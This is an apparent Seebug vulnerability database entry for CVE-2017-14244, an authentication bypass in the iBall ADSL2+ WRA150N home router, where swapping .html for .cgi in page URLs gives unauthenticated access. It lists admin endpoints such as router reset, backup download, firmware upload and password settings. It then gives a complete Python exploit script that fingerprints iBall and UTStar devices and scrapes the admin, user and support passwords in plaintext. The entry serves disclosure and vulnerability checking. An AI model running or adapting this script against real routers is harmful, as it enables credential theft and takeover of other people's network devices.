iBall ADSL2+ Home Router Authentication Bypass Vulnerability(CVE-2017-14244)

2017-10-11T00:00:00
ID SSV:96644
Type seebug
Reporter Root
Modified 2017-10-11T00:00:00

Description

Exploit Title: iBall ADSL2+ Home Router Authentication Bypass Vulnerability

  • CVE: CVE-2017-14244
  • Date: 15-09-2017
  • Exploit Author: Gem George
  • Author Contact: https://www.linkedin.com/in/gemgrge
  • Vulnerable Product: iBall ADSL2+ Home Router WRA150N https://www.iball.co.in/Product/ADSL2--Home-Router/746
  • Firmware version: FW_iB-LR7011A_1.0.2
  • Vendor Homepage: https://www.iball.co.in
  • Reference: https://www.techipick.com/iball-baton-adsl2-home-router-utstar-wa3002g4-adsl-broadband-modem-authentication-bypass

Vulnerability Details

iBall ADSL2+ Home Router does not properly authenticate when pages are accessed through cgi version. This could potentially allow a remote attacker access sensitive information and perform actions such as reset router, downloading backup configuration, upload backup etc.

How to reproduce

Suppose 192.168.1.1 is the router IP and one of the valid page in router is is http://192.168.1.1/abcd.html, then the page can be directly accessed as as http://192.168.1.1/abcd.cgi

Example URLs:

  • http://192.168.1.1/info.cgi – Status and details
  • http://192.168.1.1/upload.cgi – Firmware Upgrade
  • http://192.168.1.1/backupsettings.cgi – perform backup settings to PC
  • http://192.168.1.1/pppoe.cgi – PPPoE settings
  • http://192.168.1.1/resetrouter.cgi – Router reset
  • http://192.168.1.1/password.cgi – password settings
                                        
                                            
                                                #/bin/python
# -*- coding: utf-8 -*- 
import sys
import os
import urllib2
import argparse
import re
from termcolor import colored

def get_response(url):
	response = urllib2.urlopen(url)
	return response.read()

def get_info(url):
	res = get_response(url + '/info.cgi')
	if "iB-WRA150N" in res: 	
		print colored('[INF]','green'),  'Device identified: iBall 150M Wireless-N ADSL2+ Router (iB-WRA150N)'
		print colored('[RES]', 'red'),  'Vulnerable to CVE-2017-6558'
		print colored('[RES]', 'red'), 'Firmware Version: ' + find_between(res, '<td>', '</td>')
		get_cred(url)
	else:
		if "ADSL2+" in res:		
			print colored('[INF]','green'), 'Device identified: iBall ADSL2+ Home Router WRA150N'
			print colored('[RES]','red'), 'Vulnerable to CVE-2017-14244'
			print colored('[RES]','red'),'Firmware Version: FW' + find_between(res, 'FW', '</td>')
		else:
			if "96338W" in res:	
				print colored('[INF]','green'), 'Device identified: UTStar WA3002G4 ADSL Broadband Modem'
				print colored('[RES]','red'), 'Vulnerable to CVE-2017-14243'
				get_cred(url)
			else:
				print colored('[INF]','green'), 'Device not vulnerable to CVE-2017-6558, CVE-2017-14243 or CVE-2017-14244'
	
	print colored('\r\nCompleted!\r\n','green'), 
def get_cred(url):
	res = get_response(url + '/password.cgi')
	matches = re.findall("(?<=\s').*?(?=')", res, re.DOTALL)
	print '\nUsernames\tPasswords\n', colored('---------\t----------', 'green')
	print 'admin\t\t' + matches[0] + '\nuser\t\t' + matches[1] + '\nsupport\t\t' + matches[2]

def find_between( s, first, last ):
	try:
		start = s.index( first ) + len( first )
		end = s.index( last, start )
		return s[start:end]
	except ValueError:
        	return ""

def display_info():
	print colored('\r\n¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦','green')
	print colored('¦','green'), '  Check for CVE-2017-6558, CVE-2017-14243 & CVE-2017-14244	', colored('¦','green')
	print colored('¦','green'), '		 Created by: Gem George				' , colored('¦','green')
	print colored('¦','green'), '	 Website: https://www.techipick.com/ 			', colored('¦','green')
	print colored('¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦','green')
	print "\r\n"
	print colored('[SET]','blue'), 'Target URL: ', sys.argv[1]

def main():
	if len(sys.argv) != 2:
		print 'Wrong argument count\nEg: ' + os.path.basename(__file__) + ' http://192.168.1.1'
		exit()
	else:
		display_info()		
		url = sys.argv[1].rstrip('/')
		get_info(url)
 
if __name__ == "__main__":
    main()